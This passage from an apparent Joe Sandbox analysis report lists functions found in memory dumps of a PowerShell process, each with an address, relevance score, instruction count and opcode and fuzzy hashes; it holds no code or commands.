                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDB550 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9fd71a14e80450909a085e95c7c2ddf22caa0c2db61c41f551e93ad811e6a504
                                                                                                                                                                        • Instruction ID: 70db3a5851bbb580de090d92635ad77fe4b0136a36e2935af1889f2c94356031
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd71a14e80450909a085e95c7c2ddf22caa0c2db61c41f551e93ad811e6a504
                                                                                                                                                                        • Instruction Fuzzy Hash: 64C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDB548 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8c734b8d854061985d5759a4712cae71476f5f3048dd46fb9b8b104f725341c2
                                                                                                                                                                        • Instruction ID: 78a95b15274c68328ca30d2e56a284edbe826d6311183a56348a3a53186fa780
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c734b8d854061985d5759a4712cae71476f5f3048dd46fb9b8b104f725341c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 23C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDA470 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d254447e5bef130bea9ae8134a77a1b25e5ae317d830d1b140539fc393071c59
                                                                                                                                                                        • Instruction ID: 93d6b9aa07f60a0096716a1b6d92bd4524eb02c214df83fbafc4123f9ec26501
                                                                                                                                                                        • Opcode Fuzzy Hash: d254447e5bef130bea9ae8134a77a1b25e5ae317d830d1b140539fc393071c59
                                                                                                                                                                        • Instruction Fuzzy Hash: E1618E39B001048FDB45EFA9D451A6E7FF7EBC9604B248019E506EB388EF34DD428B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDA460 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8fa5072acb19234f3689f8dda56d020f2f5db172aedd34cece38a292515afbcf
                                                                                                                                                                        • Instruction ID: cbb5f270f643c02607ff80d8b9c09ac9fcbd0a57edda085b97bf9c53c526ff02
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fa5072acb19234f3689f8dda56d020f2f5db172aedd34cece38a292515afbcf
                                                                                                                                                                        • Instruction Fuzzy Hash: 94518239B00104CF9B45EFA8D455A6E7BF7EBC9305B148015E506AB388EF34DD428F92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDA468 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 46a6dfec3ee1875a42288fe397a859977cfcf751575bceed81df6bd06cf07295
                                                                                                                                                                        • Instruction ID: 7bc789934db6347fb03d4b312d09915d6f3a2a37ba631eaef6c9bffd63e524cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 46a6dfec3ee1875a42288fe397a859977cfcf751575bceed81df6bd06cf07295
                                                                                                                                                                        • Instruction Fuzzy Hash: DF517039B001048FDB45EFA8D551A6E7FF7EBC9214B148019E906AB388EF34DD428B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD7568 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d0c33b642a6a7ead7dd0b05b9e7b212b59436232bbd217b0dcbd661169f1949c
                                                                                                                                                                        • Instruction ID: 779160e817520d72f58b8ba29f8b1a33ad15f4948c813262cfb633e2e8dcf2d1
                                                                                                                                                                        • Opcode Fuzzy Hash: d0c33b642a6a7ead7dd0b05b9e7b212b59436232bbd217b0dcbd661169f1949c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C516C31A047099FCB15DFA9C8506DDFBF1EF89300F1586AAE449AB265FB709D85CB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6158 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4b550adce99740c354006652e29d89d3c4d80be7b24b64f38c29365c7bfea52b
                                                                                                                                                                        • Instruction ID: d95cdfacb84fcc8b1c6bdb2d1abe8761db70c0993ff305ef604f1539c1efc575
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b550adce99740c354006652e29d89d3c4d80be7b24b64f38c29365c7bfea52b
                                                                                                                                                                        • Instruction Fuzzy Hash: BC41BB34A10104CBEB00DB99D945BAEF7F3EBC9310F6481AAE106AB395EF755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6154 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6fa572def8996f4c83801521b234e4734f470bafda9ba0d499f2defb7ef2d40c
                                                                                                                                                                        • Instruction ID: 04fdf46833cf76864b8043018ab41f513117c9dfe9c106bb9c853e855a04f407
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fa572def8996f4c83801521b234e4734f470bafda9ba0d499f2defb7ef2d40c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C41B934A00104CBEB04DF99D945BAAF7F3FBC9310F2481ABE002AB795EB755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6150 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2908d392e3d76c4556ab86dbb38b28dc6932bfe7e60dd9d36de127bf1fac0ad3
                                                                                                                                                                        • Instruction ID: 37aa7feb14d93a1f9f20949ab2bf231cdf81b3d6c451fa7caf988422af2e89d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2908d392e3d76c4556ab86dbb38b28dc6932bfe7e60dd9d36de127bf1fac0ad3
                                                                                                                                                                        • Instruction Fuzzy Hash: CA41BB34A00104CBEB00CF99D945BAAF7F3EBC9310F2481A7E002AB395EB755C458B81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6160 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a3019b191258ff16a42f7455a780fb833f674b97022947d82c77686e10381ca9
                                                                                                                                                                        • Instruction ID: a3e7adb02353f2291f64700c55f6651704a16cde6beb854d32c8dfcd286596a0
                                                                                                                                                                        • Opcode Fuzzy Hash: a3019b191258ff16a42f7455a780fb833f674b97022947d82c77686e10381ca9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41A934A10104CBEB04DB99D945BAAF7F3EBC9310F2481AAE006AB795EB755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6B48 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3689b66123c4571fa20eb7a74e84e1c6ab995bcdb6f8ac2df9fac3989c18a58d
                                                                                                                                                                        • Instruction ID: 78b7d6ad51ef629682c731a4040ea5194ee6b364f0bff6917cf07072b572e895
                                                                                                                                                                        • Opcode Fuzzy Hash: 3689b66123c4571fa20eb7a74e84e1c6ab995bcdb6f8ac2df9fac3989c18a58d
                                                                                                                                                                        • Instruction Fuzzy Hash: 76413571D102198FCF04DFA9D998AAEBBF5EF88300F14856AD805F7360EB745904CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD2D74 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9d42ee6f39a47efa3830de1e890993a77ef11092cbd78defd62d037cf10eac73
                                                                                                                                                                        • Instruction ID: f8aaa5ecea35829056341af18e507bea5d6fda1032833f0ff12e706bd8060f36
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d42ee6f39a47efa3830de1e890993a77ef11092cbd78defd62d037cf10eac73
                                                                                                                                                                        • Instruction Fuzzy Hash: 8841EFB1D002089BDB20CFA9C984ADDFBF5BF89700F24846AD409BB311E7756A49CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD2D73 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 147cd379a9a1ba38c2f3dc18fd3973d2073498b733237b226718a6817c006a39
                                                                                                                                                                        • Instruction ID: 192b80dea4a308952227ecf4efb61ba0a0af9f8e026b8c943172b00650fa1ce6
                                                                                                                                                                        • Opcode Fuzzy Hash: 147cd379a9a1ba38c2f3dc18fd3973d2073498b733237b226718a6817c006a39
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E41D0B1D002089BDB20CFA9C984ADDFBF5BF89700F25846AD409BB351E7756A49CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD331D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ac3f12d6538a89d648a654690259367f89c772ddb9b20ff3365bad053cfea3fb
                                                                                                                                                                        • Instruction ID: d5bb16bd528d4c847e5ad325a8832952e7edaecdcc0ada52b947b6e4441124bf
                                                                                                                                                                        • Opcode Fuzzy Hash: ac3f12d6538a89d648a654690259367f89c772ddb9b20ff3365bad053cfea3fb
                                                                                                                                                                        • Instruction Fuzzy Hash: F541E1B1D002098BDB10CFA9C584ADDFBF1BF89704F24846AD409BB211D7756A49CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD875D Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c0241d25f66102d3da0818e151238a3f5cde530a2148dbeec8c94c47691e3421
                                                                                                                                                                        • Instruction ID: efb5d44a4dd754f3803c078419493ad4c6aeef0cc2e91229989b874196d6e88e
                                                                                                                                                                        • Opcode Fuzzy Hash: c0241d25f66102d3da0818e151238a3f5cde530a2148dbeec8c94c47691e3421
                                                                                                                                                                        • Instruction Fuzzy Hash: 34318E38B00100CFE740EB65D885B6ABBF6FB85302F608165E4019B398EF349D46CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8750 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1977f4b12ed9e25bf13849e6787e2d6fdf2eec214ed2a6abb7a10fc09d962017
                                                                                                                                                                        • Instruction ID: 2568a089ba18313d4e7acd5d85763dc9d3cebc8213db8c821a5363f48b918016
                                                                                                                                                                        • Opcode Fuzzy Hash: 1977f4b12ed9e25bf13849e6787e2d6fdf2eec214ed2a6abb7a10fc09d962017
                                                                                                                                                                        • Instruction Fuzzy Hash: 52317C38B00100CFE740DB64D885B6ABBF6FB85302F608166E4129B398EF349D46CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8758 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ce9df586aa22c1a671ec91c4d96476f021b0c6f1835e167a48d7ebeda2b1d7b2
                                                                                                                                                                        • Instruction ID: 2ef64289bbc0ac101bfedfc9e096097c8078657ce6582e0074307357691bd7b2
                                                                                                                                                                        • Opcode Fuzzy Hash: ce9df586aa22c1a671ec91c4d96476f021b0c6f1835e167a48d7ebeda2b1d7b2
                                                                                                                                                                        • Instruction Fuzzy Hash: CD318F38B00100CFE740DB64D885B6ABBF6FB85302F608166E4119B398EF349D46CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8760 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 52eba0f65fa666ad34aa42125cf23a5f0276c50c241fe63ca590800a1dbfa4ff
                                                                                                                                                                        • Instruction ID: cc6a284bcb31f570d2af412d0f0736bafb5646d490448d25d9211c97008e5efa
                                                                                                                                                                        • Opcode Fuzzy Hash: 52eba0f65fa666ad34aa42125cf23a5f0276c50c241fe63ca590800a1dbfa4ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E318D38B00100CFE740DB64D885B6ABBF6FB85302F608165E4019B398EF34AD46CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9AD4 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ad5306dc649e17e63a645845161f4860127526bf9f83b1195b6f9c5b08c76ea9
                                                                                                                                                                        • Instruction ID: b75b0442b926ad13a4a5aed4e9043db0009177ce1d0c3dd03c5ae3197ef8915f
                                                                                                                                                                        • Opcode Fuzzy Hash: ad5306dc649e17e63a645845161f4860127526bf9f83b1195b6f9c5b08c76ea9
                                                                                                                                                                        • Instruction Fuzzy Hash: BD216D39710104CFC740EBA4E885B6F7BB6EB89300F248166E5169B354EE319D41CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9AC8 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 23e81da74cc143ab6ee39379ab56501cd844caacfbab5c17a52802e98552de78
                                                                                                                                                                        • Instruction ID: 6a983c9e43343841c3e7269042c5448c81dd362693673936b99558fd3617054a
                                                                                                                                                                        • Opcode Fuzzy Hash: 23e81da74cc143ab6ee39379ab56501cd844caacfbab5c17a52802e98552de78
                                                                                                                                                                        • Instruction Fuzzy Hash: BD216D39710100CFD740EBA4E884BAFBBF6EB89300F248166E52A9B354EE309D41DBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9AD0 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0d12544cde08e5df4f1da085ac6c8dd8aa866f6f8b01b76fb61149f9de4d25c9
                                                                                                                                                                        • Instruction ID: 104488cf32961258854076dbc31b861d67e99dd1ad424fbf7e91ceddd2ffbfce
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d12544cde08e5df4f1da085ac6c8dd8aa866f6f8b01b76fb61149f9de4d25c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 42216D39710100CFC740EBA4E894B6F7BF6EB89300F248166E51A9B354EE359D45DB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9AD8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 267316b78f17591ca2e04ebeb68f5637eeffe1ef03952e21604cf5f2b943bea2
                                                                                                                                                                        • Instruction ID: 7739623d9f070e38517a52018212bbb43ef7325994b10ec234c1b0ab384a9264
                                                                                                                                                                        • Opcode Fuzzy Hash: 267316b78f17591ca2e04ebeb68f5637eeffe1ef03952e21604cf5f2b943bea2
                                                                                                                                                                        • Instruction Fuzzy Hash: DD216B39710100CFC740EBA4E884B6F7BB6EB89300F248166E5269B398EE30AD41CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD71E8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fca86715803cce45eb300519af6a5d9aca421d1c4e1d5ff5f5b328f3f53e7ef6
                                                                                                                                                                        • Instruction ID: 004fa8e7e1f63b90cdde7ee2f58a8ef982f97dae55b7925739e4c7a76c70dd04
                                                                                                                                                                        • Opcode Fuzzy Hash: fca86715803cce45eb300519af6a5d9aca421d1c4e1d5ff5f5b328f3f53e7ef6
                                                                                                                                                                        • Instruction Fuzzy Hash: BB31E1B0D042089FDB24CF9AC988BDEFBF5EB48710F24845AE409A7350EBB55844CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00AED01C Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522635799.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_aed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b95023782bb2025e4144f4c6728f0bca21c0b6af723051f2764943791135de8c
                                                                                                                                                                        • Instruction ID: 0d56db77a344bfbad0c4132a711bb991658b1d3cfab07364fa7b78958edb69ac
                                                                                                                                                                        • Opcode Fuzzy Hash: b95023782bb2025e4144f4c6728f0bca21c0b6af723051f2764943791135de8c
                                                                                                                                                                        • Instruction Fuzzy Hash: F1210171204280EFDB15DF14D9C4B26BFA6FB84724F28C569E8060B246C336D84ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00ADEAE4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522536874.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_add000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0af9251057bcb76e91c8818fda029b1a9029d5a21e258aea2a8446b7e7f0ef2c
                                                                                                                                                                        • Instruction ID: ebc613dfb365d598dd441551632a0f2e3c1ba5c173073bac9845416081919e4a
